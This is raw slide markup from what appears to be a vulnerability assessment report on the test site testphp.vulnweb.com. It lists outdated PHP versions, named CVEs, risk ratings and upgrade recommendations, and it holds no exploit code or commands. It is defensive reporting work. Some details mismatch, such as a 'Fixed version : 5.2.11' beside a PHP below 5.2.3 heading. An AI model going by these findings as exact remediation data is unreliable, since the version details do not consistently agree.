                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>VULNERABILITY TEST RESULT:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Version source :http://testphp.vulnweb.com/secured/phpinfo.php </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Installed version : 5.1.6 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Fixed version : 5.2.11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="582167" y="600891"/>
            <a:ext cx="6877119" cy="923109"/>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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>4. PHP &lt; 5.2.3 Multiple Vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="156" name="Google Shape;156;p14"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="266337" y="1341120"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{28809880-DC93-42FB-976C-2E7F37E6F614}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11659325"/>
              </a:tblGrid>
              <a:tr h="358375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OBSERVATION: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2238100">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1400">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>According to its banner, the version of PHP installed on the remote host is older than 5.2.3. It is, therefore, affected by multiple vulnerabilities:</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1400">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- A buffer overflow in the sqlite_decode_function() in the bundled sqlite library could allow context-dependent attackers to execute arbitrary code. (CVE-2007-1887)</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1400">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- A CRLF injection vulnerability in the FILTER_VALIDATE_EMAIL filter could allow an attacker to inject arbitrary email headers via a special email address. This only affects Mandriva Linux 2007.1.(CVE-2007-1900)</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1400">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- An infinite-loop flaw was discovered in the PHP gd extension. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>(CVE-2007-2756)</a:t>
                      </a:r>
                      <a:endParaRPr b="0" i="0" sz="1200">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:latin typeface="Quattrocento Sans"/>
                        <a:ea typeface="Quattrocento Sans"/>
                        <a:cs typeface="Quattrocento Sans"/>
                        <a:sym typeface="Quattrocento Sans"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1400">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- An integer overflow flaw was found in the chunk_split() function that could possibly execute arbitrary code as the apache user if a remote attacker was able to pass arbitrary data to the third argument of chunk_split() (CVE-2007-2872).</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1400">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- An open_basedir and safe_mode restriction bypass which could allow context-dependent attackers to determine the existence of arbitrary files. (CVE-2007-3007)</a:t>
                      </a:r>
                      <a:endParaRPr sz="14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58375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK:                                                                             </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>         HIGH                  MEDIUM                  LOW</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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780925">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>A remote attacker can run a script to process PNG images from an untrusted source that will allow him to cause denial of service.</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58375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800"/>
                        <a:t>RECOMMENDATIONS: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747425">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>We recommend to upgrade to PHP version 5.2.3 or later.</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157" name="Google Shape;157;p14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7202383" y="3944981"/>
            <a:ext cx="513806" cy="348343"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF00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158" name="Google Shape;158;p14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9247383" y="3944981"/>
            <a:ext cx="574766" cy="348343"/>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159" name="Google Shape;159;p14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10837091" y="3944981"/>
            <a:ext cx="574766" cy="348343"/>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5"/>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rPr b="1" lang="en-US"/>
              <a:t>PHP &lt; 5.2.3 Multiple Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165" name="Google Shape;165;p15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="740229" y="1724296"/>
            <a:ext cx="10903131" cy="2586446"/>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rgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>VULNERABILITY TEST RESULT:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Version source : http://testphp.vulnweb.com/secured/phpinfo.php </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Installed version : 5.1.6 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Fixed version : 5.2.3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166" name="Google Shape;166;p15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="2828836"/>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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courie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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="451538" y="605246"/>
            <a:ext cx="6877119" cy="870421"/>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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>5. PHP &lt; 5.2.6 Multiple Vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="172" name="Google Shape;172;p16"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="266337" y="1341120"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{28809880-DC93-42FB-976C-2E7F37E6F614}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11659325"/>
              </a:tblGrid>
              <a:tr h="358375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OBSERVATION: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2238100">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>According to its banner, the version of PHP installed on the remote host is older than 5.2.6. Such versions may be affected by the following issues :</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- A stack-based buffer overflow in FastCGI SAPI.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- An integer overflow in printf().</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- An security issue arising from improper calculation of the length of PATH_TRANSLATED in cgi_main.c.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- A safe_mode bypass in cURL.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- Incomplete handling of multibyte chars inside escapeshellcmd().</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- Issues in the bundled PCRE fixed by version 7.6.</a:t>
                      </a:r>
                      <a:endParaRPr sz="14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58375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK:                                                        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>                                HIGH                  MEDIUM                  LOW</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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780925">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>This can be exploited by an attacker who is able to trigger ‘imagecolormatch’ calls.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58375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800"/>
                        <a:t>RECOMMENDATIONS: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747425">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>We recommend to upgrade to PHP version 5.2.6 or later.</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173" name="Google Shape;173;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7245531" y="4005943"/>
